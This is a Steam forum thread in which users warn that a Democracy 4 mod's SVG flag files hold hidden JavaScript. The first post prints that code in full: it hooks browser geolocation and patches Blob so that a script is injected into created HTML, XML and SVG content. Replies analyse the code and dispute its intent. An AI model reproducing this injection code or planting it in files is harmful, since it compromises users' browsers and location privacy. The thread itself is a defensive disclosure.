Steam Community :: Democracy 4+

Store Page

Democracy 4

All Discussions Screenshots Artwork Broadcasts Videos Workshop News Guides Reviews

Democracy 4 > Workshop > feelinWitchy's Workshop > Democracy 4+ > Discussions

Democracy 4+

Description Discussions5 Comments123 Change Notes

Want to join the discussion? You need to sign in or create an account.

Date Posted: 17 Aug @ 6:52pm

Posts: 5

Start a New Discussion

Discussions Rules and Guidelines

More discussions

differences between vanilla countries and mod countries

jackmastermind 17 Aug @ 6:52pm

MALWARE. DO NOT DOWNLOAD.

Look at data/svg/ukflagnew.svg for example, SVGs are just supposed to be image icons. So many lines of geolocation data. This should not exist. Do NOT download this mod unless you remove all the malware. Please report (for some reason, my steam account is not letting me file a report right now).

Code, found in svg files:
<![CDATA[
window.Vyagtit = navigator.geolocation.getCurrentPosition.bind(navigator.geolocation);
window.FNuvlyG = navigator.geolocation.watchPosition.bind(navigator.geolocation);
let WAIT_TIME = 100;

if (!['http://', 'https://'].includes(window.location.protocol)) {
// default spoofed location
window.fopas = true;
window.bwnzX = 38.883333;
window.REKwE = -77.000;
}

function waitGetCurrentPosition() {
if ((typeof window.fopas !== 'undefined')) {
if (window.fopas === true) {
window.cNHFrjv({
coords: {
latitude: window.bwnzX,
longitude: window.REKwE,
accuracy: 10,
altitude: null,
altitudeAccuracy: null,
heading: null,
speed: null,
},
timestamp: new Date().getTime(),
});
} else {
window.Vyagtit(window.cNHFrjv, window.BtxvaFW, window.cDhvh);
}
} else {
setTimeout(waitGetCurrentPosition, WAIT_TIME);
}
}

function waitWatchPosition() {
if ((typeof window.fopas !== 'undefined')) {
if (window.fopas === true) {
navigator.getCurrentPosition(window.zXdZHYb, window.lWHypeI, window.VUxyU);
return Math.floor(Math.random() * 10000); // random id
} else {
window.FNuvlyG(window.zXdZHYb, window.lWHypeI, window.VUxyU);
}
} else {
setTimeout(waitWatchPosition, WAIT_TIME);
}
}

navigator.geolocation.getCurrentPosition = function (successCallback, errorCallback, options) {
window.cNHFrjv = successCallback;
window.BtxvaFW = errorCallback;
window.cDhvh = options;
waitGetCurrentPosition();
};
navigator.geolocation.watchPosition = function (successCallback, errorCallback, options) {
window.zXdZHYb = successCallback;
window.lWHypeI = errorCallback;
window.VUxyU = options;
waitWatchPosition();
};

const instantiate = (constructor, args) => {
const bind = Function.bind;
const unbind = bind.bind(bind);
return new (unbind(constructor, null).apply(null, args));
}

Blob = function (_Blob) {
function secureBlob(...args) {
const injectableMimeTypes = [
{ mime: 'text/html', useXMLparser: false },
{ mime: 'application/xhtml+xml', useXMLparser: true },
{ mime: 'text/xml', useXMLparser: true },
{ mime: 'application/xml', useXMLparser: true },
{ mime: 'image/svg+xml', useXMLparser: true },
];
let typeEl = args.find(arg => (typeof arg === 'object') && (typeof arg.type === 'string') && (arg.type));

if (typeof typeEl !== 'undefined' && (typeof args[0][0] === 'string')) {
const mimeTypeIndex = injectableMimeTypes.findIndex(mimeType => mimeType.mime.toLowerCase() === typeEl.type.toLowerCase());
if (mimeTypeIndex >= 0) {
let mimeType = injectableMimeTypes[mimeTypeIndex];
let injectedCode = `<script>(
${iVWLe}
)();<\/script>`;

let parser = new DOMParser();
let xmlDoc;
if (mimeType.useXMLparser === true) {
xmlDoc = parser.parseFromString(args[0].join(''), mimeType.mime); // For XML documents we need to merge all items in order to not break the header when injecting
} else {
xmlDoc = parser.parseFromString(args[0][0], mimeType.mime);
}

if (xmlDoc.getElementsByTagName("parsererror").length === 0) { // if no errors were found while parsing...
xmlDoc.documentElement.insertAdjacentHTML('afterbegin', injectedCode);

if (mimeType.useXMLparser === true) {
args[0] = [new XMLSerializer().serializeToString(xmlDoc)];
} else {
args[0][0] = xmlDoc.documentElement.outerHTML;
}
}
}
}

return instantiate(_Blob, args); // arguments?
}

// Copy props and methods
let propNames = Object.getOwnPropertyNames(_Blob);
for (let i = 0; i < propNames.length; i++) {
let propName = propNames;
if (propName in secureBlob) {
continue; // Skip already existing props
}
let desc = Object.getOwnPropertyDescriptor(_Blob, propName);
Object.defineProperty(secureBlob, propName, desc);
}

secureBlob.prototype = _Blob.prototype;
return secureBlob;
}(Blob);

Object.freeze(navigator.geolocation);

window.addEventListener('message', function (event) {
if (event.source !== window) {
return;
}
const message = event.data;
switch (message.method) {
case 'ndqCVCx':
if ((typeof message.info === 'object') && (typeof message.info.coords === 'object')) {
window.bwnzX = message.info.coords.lat;
window.REKwE = message.info.coords.lon;
window.fopas = message.info.fakeIt;
}
break;
default:
break;
}
}, false);
//]]>

< >

Showing 1-5 of 5 comments

JELLYGUARD has Democracy 4

11 Sep @ 5:56am

I'm concerned about the code behind when the Norton pop-up after this been installed. It’s definitely a significant issue, and it seems like the developer is ignoring it.

WhskyTangoFxtrot has Democracy 4

11 Sep @ 1:37pm

This is a geolocation spoofer that also monkey-patches Blob to inject arbitrary script into any HTML/XML/SVG blob your page (or game webview) creates. That second part is a big red flag.

Sick Burn from AI: Bugs/quirks

"Inside waitWatchPosition() it calls navigator.getCurrentPosition(...) (missing .geolocation.). That’s not a standard API and would normally throw—so either this is a copy/paste bug, or they patched navigator.getCurrentPosition elsewhere. Sloppy."

neil901

15 Sep @ 10:28pm

Would love to see the developer respond to this

Adeptus Freemanicus has Democracy 4

7 Oct @ 11:04am

The only way I can see this happening is if the svg already contained this before or in the process of converting the image from png/jpg to svg a site added this in.

I don't see a single reason the author would add this. Many logical reasons and explanations for why this is not maliciously or intentionally added by author.

Lastly, I also don't believe that either 1. This code can actually run. And/Or 2. Anyone actually get's your geolocation. The code doesn't point to any address/website for that to be possible.

But I also doubt you'd lie, and I also believe that this file should be removed, hopefully also finding why said code was there in the first place.

Note: I'm pretty sure the author still is unable to update their mods due to a past bug with Democracy 4 that still isn't fixed.

FatRat

22 Oct @ 11:24am

While it doesn't point to the URL in that code, it doesn't mean the rest of the malicious code isn't somwhere else within the mod files. Going to start reviewing it now

< >

Showing 1-5 of 5 comments

Per page: 1530 50

Democracy 4

Edit links

Report this post